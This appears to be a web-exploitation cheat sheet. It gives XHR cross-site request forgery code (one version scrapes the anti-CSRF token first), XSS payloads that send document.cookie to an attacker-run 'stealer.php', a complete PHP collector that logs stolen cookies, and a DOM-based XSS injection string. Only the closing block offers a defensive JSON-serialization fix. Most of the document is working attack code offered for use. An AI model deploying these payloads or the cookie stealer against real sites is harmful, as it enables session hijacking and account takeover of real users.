XHR CSRF exploit

Without a CSRF filter, against a regular (URL-encoded) form:

var target = "https://target.com";
var params = "username=myUsername&password=myPassword";
var xhr = new XMLHttpRequest();
xhr.open("POST", target, false); // synchronous request
// A regular form posts as application/x-www-form-urlencoded; without this
// header XHR sends a string body as text/plain
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(params);

With a CSRF token filter, against a multipart/form-data form:

var res = null;
var token = null;
var target = "https://target.com";
// Fetch the page that carries the CSRF token (synchronous request)
var xhr = new XMLHttpRequest();
xhr.open("GET", target, false);
xhr.send(null);
if ( xhr.readyState === 4 ) {
  // Parse the response as DOM in a detached div and read the token field
  res = document.createElement( 'div' );
  res.innerHTML = xhr.responseText;
  token = res.querySelector("#token").value;
  // Send the payload as a multipart/form-data body (parts separated by CRLF)
  var boundary = "----WebKitFormBoundarygBe7zTLe1GhTyPGA";
  xhr.open("POST", target, false);
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
  xhr.send('--' + boundary + '\r\n' +
        'Content-Disposition: form-data; name="username"\r\n\r\n' +
        'myUsername\r\n' +
        '--' + boundary + '\r\n' +
        'Content-Disposition: form-data; name="password"\r\n\r\n' +
        'myPassword\r\n' +
        '--' + boundary + '\r\n' +
        'Content-Disposition: form-data; name="token"\r\n\r\n' +
        token + '\r\n' +
        '--' + boundary + '--');
  if ( xhr.readyState === 4 ) {
     // Log the result
     console.log(xhr.responseText);
  }
}

XSS Cookie Stealer

Two ways:

  • Redirection
  • Hidden image load

Trigger a redirection to your cookie stealer from the vulnerable target:

<script type="text/javascript">
location.href = 'https://myserver.com/stealer.php?cookie='+ document.cookie;
</script>

Or load an image:

<script type="text/javascript">
// The image never renders; the request alone carries the cookie out
var image = new Image();
image.src = 'https://myserver.com/stealer.php?cookie=' + document.cookie;
</script>

Then set up your cookie stealer on your server:

<?php
// Get the cookie passed as a GET parameter
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
// Output file and its maximum size in bytes
$filename = 'intercept.txt';
$MAX_SIZE = 4096;
// If data is available, append it to the file
if ( $cookie !== '' ) {
  // Quick safeguard: truncate the file once it grows past $MAX_SIZE
  if ( file_exists($filename) && filesize($filename) > $MAX_SIZE ) {
    $option = 'w';
  }
  else {
    $option = 'a';
  }
  $fp = fopen($filename, $option);
  // Double quotes so that \r\n is a real CRLF, not the literal characters
  fputs($fp, $cookie . "\r\n");
  fclose($fp);
}
?>
<!-- Redirect the user to a standard location -->
<script>location.replace('https://losnia.com');</script>

The result is written to intercept.txt as follows:

PRIVILEGE_COOKIE=IsI9P7dLS8oIOq4ckeNM2WfD6

DOM-based XSS exploit

For a dictionary (JavaScript object literal) built from user-supplied data:

  • A clan name
  • An area

Even if JS keywords and most special characters are banned, a malicious user can still exploit the data.

For example, using techniques such as character escaping and DOM updates, an attacker can completely redefine a function.

<script type="text/javascript">
this.character = {
  "player": "Kaƫl",
  "clan": "Losnia",
  "functions": {
    "compute": this.compute,
    "reset": this.reset,
    "giveup": this.giveup
  },
  "area": "France"
};
</script>
clan="/*
area=a*/,functions:{computer:this.compute,reset:this.reset,giveup:{d:window[ /locat/.source%2B/ion/.source]=/https:\/\/myserver.com\/stealer.php?c=/.source%2Bdocument.cookie}}//
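As an added example (not part of the original notes; the helper names are hypothetical), the same object literal built with JSON serialization instead of string concatenation, so that clan and area values like the ones above stay inside their string literals instead of breaking out of them:

```javascript
// Added example, not from the original notes: serialize user-supplied fields
// with JSON instead of concatenating them into the <script> body, so that a
// value such as '"/*' or 'a*/,functions:{...}//' stays an ordinary string.

// JSON.stringify escapes quotes and backslashes, but a few characters that are
// legal in JSON still break a <script> body; escape them as \uXXXX sequences.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')       // neutralizes </script> and <!--
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')  // JS line terminators that JSON allows raw
    .replace(/\u2029/g, '\\u2029');
}

// Builds the inline script. Only data goes through the serializer; the
// function references are wired up in static code, so user input can never
// name or replace them.
function renderCharacterScript(player, clan, area) {
  var data = { player: player, clan: clan, area: area };
  return '<script type="text/javascript">\n' +
    'this.character = Object.assign(' + jsonForScript(data) + ', {\n' +
    '  functions: { compute: this.compute, reset: this.reset, giveup: this.giveup }\n' +
    '});\n' +
    '</script>';
}

// Demonstration helper: run the generated script against a context object the
// way the browser would (ctx plays the role of `this`) and return the result.
function loadCharacter(html, ctx) {
  var js = html.replace(/^<script[^>]*>\n?/, '').replace(/<\/script>$/, '');
  new Function(js).call(ctx);
  return ctx.character;
}
```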